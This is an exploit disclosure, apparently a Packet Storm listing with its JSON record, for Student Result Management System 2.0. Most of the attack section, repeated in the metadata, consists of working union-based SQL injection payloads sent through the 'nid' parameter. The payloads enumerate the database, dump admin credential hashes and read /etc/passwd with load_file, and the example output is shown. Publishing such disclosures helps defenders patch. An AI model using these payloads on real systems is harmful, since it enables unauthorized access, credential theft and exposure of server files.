📄 Student Result Management System 2.0 SQL Injection / Local...

Description

Student Result Management System version 2.0 suffers from unauthenticated remote SQL injection...

Basic Information

ID PACKETSTORM:208779

Published Aug 22, 2025 at 00:00

Affected Product

Affected Versions # Exploit Title: Student Result Management System v2.0 Unauthenticated
SQL Injection / Local File Inclusion
# Date: 2025-08-22
# Exploit Author: Mehmet Can Kadıoğlu a.k.a mao7un
# Vendor: https://phpgurukul.com/student-result-management-system/
# Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/
# Tested on: Arch Linux
# CVE: N/A

PoC:
Click on an article on the notice board at random and parameter 'nid' is
vulnerable to union-based sql injection
1- for version information
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,version(),3,4-- -
10.11.7-MariaDB-42- get databases on the server
http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -

information_schemasrms

3- tables in the srms database

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE
table_schema='srms'-- -
admintblnoticetblstudents
4- get columns in table admin

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE
table_name='admin'-- -

UserNamePassword

5- dump data

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION ALL SELECT 1,concat(UserName,":",Password),3,4 FROM srms.admin-- -
admin:f925916e[REDACTED]533251

6- get local file (/etc/passwd)

http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'
UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ....

{
    "lastseen": "2025-08-22T17:56:50",
    "description": "Student Result Management System version 2.0 suffers from unauthenticated remote SQL injection...",
    "published": "2025-08-22T00:00:00",
    "modified": "2025-08-22T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Student Result Management System 2.0 SQL Injection / Local File Inclusion",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:208779",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "# Exploit Title: Student Result Management System v2.0 Unauthenticated\n    SQL Injection / Local File Inclusion\n    # Date: 2025-08-22\n    # Exploit Author: Mehmet Can Kad\u0131o\u011flu a.k.a mao7un\n    # Vendor: https://phpgurukul.com/student-result-management-system/\n    # Demo Site: http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/\n    # Tested on: Arch Linux\n    # CVE: N/A\n    \n    PoC:\n    Click on an article on the notice board at random and parameter 'nid' is\n    vulnerable to union-based sql injection\n    1-  for version information\n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION SELECT 1,version(),3,4-- -\n    10.11.7-MariaDB-42- get databases on the server\n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata-- -\n    \n    information_schemasrms\n    \n    3-  tables in the srms database\n    \n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE\n    table_schema='srms'-- -\n    admintblnoticetblstudents\n    4- get columns in table admin\n    \n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE\n    table_name='admin'-- -\n    \n    UserNamePassword\n    \n    5- dump data\n    \n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION ALL SELECT 1,concat(UserName,\":\",Password),3,4 FROM srms.admin-- -\n    admin:f925916e[REDACTED]533251\n    \n    6- get local file (/etc/passwd)\n    \n    http://localhost/Student-Result-Management-System-Using-PHP-V2.0/srms/notice-details.php?nid=1'\n    UNION SELECT 1,load_file('/etc/passwd'),3,4 FROM srms.admin-- -\n    \n    root:x:0:0:root:/root:/usr/bin/zsh\n    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n    bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin\n    sync:x:4:65534:sync:/bin:/bin/sync\n    games:x:5:60:games:/usr/games:/usr/sbin/nologin\n    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin ....",
    "sourceHref": "https://packetstorm.news/download/208779",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/208779/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Student Result Management System 2.0 SQL Injection / Local File Inclusion_PACKETSTORM:208779

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply